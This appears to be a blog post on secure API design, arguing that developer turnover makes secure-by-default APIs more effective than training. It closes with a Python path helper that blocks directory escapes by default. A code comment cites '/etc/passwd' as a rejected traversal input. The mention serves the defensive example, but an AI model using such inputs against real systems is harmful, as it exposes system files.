Consider the developer job market for a moment. As a career technologist it is easy for me, personally, to forget that many people don't stick with a highly technical developer position for their whole careers. But of course many developers stay in the field for only a short time, perhaps 5-15 years, after which they move on to management, to other technical roles, or retire. (I don't have any hard numbers on how long developers tend to stay developers. I'd love it if someone pointed me at hard statistics on this.) At the same time, each year a new batch of college graduates enters the workforce and will require training in secure programming. Wait: don't they learn security in school? No. In my experience, software security is simply not a priority of the higher education system (at least in the USA). The only computer science students that seem to come out of school with software security knowledge are those who have an intense interest in it to begin with. These kinds of students will take all of the security electives and pick up the rest of what they need to know on their own. Unfortunately, these kinds of security-focused students rarely stick to software development for long, instead opting to move into a security role.

So here we are, trying to educate masses of developers on a wide array of technical issues to watch out for, but at the same time we lose previously educated developers each year. So any education we do in the industry can only reach a certain level of saturation. Each year a huge amount of code is still written by developers with no security training. Changing the way universities teach computer science could certainly help in this area, but this isn't a change we'll see overnight. In addition, even if security training were provided in university, the specific technical pitfalls one needs to avoid always change over time as the underlying technology changes, making past education increasingly irrelevant.

So what else can we do, with limited resources, to reduce the quantity of vulnerabilities contained in new software each year? I believe a more effective area to focus our efforts is on providing safer software development environments. When the development world made the transition from writing most software in C/C++ to using higher level languages, a major improvement came about in overall software stability and security. Programming languages that handle memory management for the developer eliminate a dozen or more classes of vulnerability (including buffer overflows, integer overflows, format string injections, use after free, etc). Of course, convincing developers to switch languages is not easy, to put it lightly. Fortunately, we don't need to: the development environments used today are much more dynamic than they used to be, being frequently updated by the core vendors and through new third-party libraries. So how can we, as security professionals, guide the ongoing refinements of development platforms to provide developers with safer environments?

In my mind, what really counts, what really makes a difference in the secure development equation, are the APIs used by developers on a day-to-day basis. Whenever a developer opens a file, runs a query, or fetches a URL, they are reliant on the platform's APIs as a significant component of their development environment. If these APIs are poorly constructed, many developers who are not familiar with the particular technology at hand are likely to make mistakes. On the other hand, if these APIs are well thought through, encourage secure data flows, and are well documented then the frequency of vulnerabilities is greatly diminished, particularly when novice developers are at the keyboard.

What makes for a good API?

This blog post is coming dangerously close to a rambling manifesto... So I'll just briefly outline the key property I believe is needed for APIs that tend to produce secure software. (In future posts I'll give concrete examples to support my assertions.)

Programming interfaces tend to encourage software security when:
The most obvious way to do something happens to be the secure way

When learning a new API, programmers tend to read the minimal amount of documentation necessary before using it. There are many reasons for this, but primarily they are rooted in the fact that "All programmers are optimists." ~Frederick Brooks, Jr.

After all, from the programmer's standpoint, if an API doesn't behave the way he expects after a brief glance at the documentation, then it probably will break his software right away before he even checks it in, or at a minimum, during the Q/A cycle. Most of the time, this works fine and allows the programmer to achieve his goals quickly. The problem with this, of course, is that programmers and Q/A staff are eternally focused on how their software is intended to be used, and not how an attacker may choose to manipulate it. This is why it is so essential to present programmers with APIs that don't contain corner-case "gotchas" that could leave open attack scenarios that won't be caught by a Q/A team's typical test suite.

Often, developers are using third-party APIs to save them time: they don't want to learn the details of how a certain file format, database protocol, or other technology really works under the hood. They just want to achieve their goals quickly by building on what others have already accomplished. That's why being "obvious" is so important. This demands that API designers should:

Not assume that programmers are going to read all of the API documentation
Not assume that programmers are particularly knowledgeable in the API's underlying technology
Ask programmers to expend a bit more effort whenever potentially dangerous features are exposed

This is not to say that APIs should avoid providing advanced features, that they must provably prevent programmers from shooting themselves in the foot, or that they must make any other unreasonable guarantees. This is simply about the default mode of operation, making conservative assumptions about API users' competence, and trying to put yourself in your users' shoes now and then. These simple things can make a huge difference in the number of applications vulnerable to attack upon first release, which can free up the security community to do more fun and interesting things.
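As one possible illustration of "the obvious way is the secure way", here is a small Python sketch of a file path helper. Everything in it is hypothetical: the function `resolve_under`, the exception `PathEscapesBase`, and the `allow_outside` flag are invented for this example and do not come from any particular library. The default call confines user-supplied paths to a base directory, and the riskier behavior is still available but takes a bit more effort to request.

```python
from pathlib import Path


class PathEscapesBase(ValueError):
    """Raised when a user-supplied path resolves outside the base directory."""


def resolve_under(base: Path, user_path: str, *, allow_outside: bool = False) -> Path:
    """Resolve user_path relative to base, refusing escapes by default.

    Callers who really need to leave the base directory must say so with the
    keyword-only allow_outside flag. Requires Python 3.9+ for is_relative_to.
    """
    base_resolved = base.resolve()
    # Joining with an absolute user_path discards the base, so the check
    # below also rejects inputs such as "/etc/passwd".
    candidate = (base_resolved / user_path).resolve()
    if not allow_outside and not candidate.is_relative_to(base_resolved):
        raise PathEscapesBase(f"{user_path!r} resolves outside {base_resolved}")
    return candidate
```

A caller who writes the shortest thing that works, `resolve_under(base, name)`, gets the confined behavior without reading any further documentation. Reaching outside the base directory requires typing `allow_outside=True`, which is easy to spot in a code review.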